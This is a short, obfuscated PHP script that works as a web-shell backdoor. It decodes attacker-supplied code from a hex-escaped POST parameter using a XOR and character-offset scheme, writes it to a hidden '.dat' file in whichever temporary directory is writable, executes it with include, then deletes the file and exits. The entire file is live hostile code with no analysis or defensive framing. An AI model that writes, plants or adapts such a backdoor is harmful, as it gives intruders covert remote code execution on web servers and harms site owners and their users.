<?php

if(!empty($_POST["f\x6C\x67"])){
	$item = $_POST["f\x6C\x67"];
	 	$item=		explode			(		'.',   $item 		);
	$token	 =		'';
            $s	 =		'abcdefghijklmnopqrstuvwxyz0123456789';
            $sLen	 =		strlen($s);
            $o	 =		0;
    
            $__tmp	 =		$item;
            while ($v1	 =		array_shift($__tmp)) {	$chS	 =		ord($s[$o	%	 $sLen]);
                $dec	 =		((int)$v1 - $chS - ($o	%	 10)) ^ 29;
                $token	.=chr($dec);
                $o++;  } 
	$value = array_filter([sys_get_temp_dir(), "/tmp", "/dev/shm", getcwd(), "/var/tmp", getenv("TEMP"), ini_get("upload_tmp_dir"), session_save_path(), getenv("TMP")]);
	foreach ($value as $comp):
    		if (max(0, is_dir($comp) * is_writable($comp))) {
    $sym = str_replace("{var_dir}", $comp, "{var_dir}/.dat");
    $file = fopen($sym, 'w');
if ($file) {
	fwrite($file, $token);
	fclose($file);
	include $sym;
	@unlink($sym);
	die();
}
}
endforeach;
}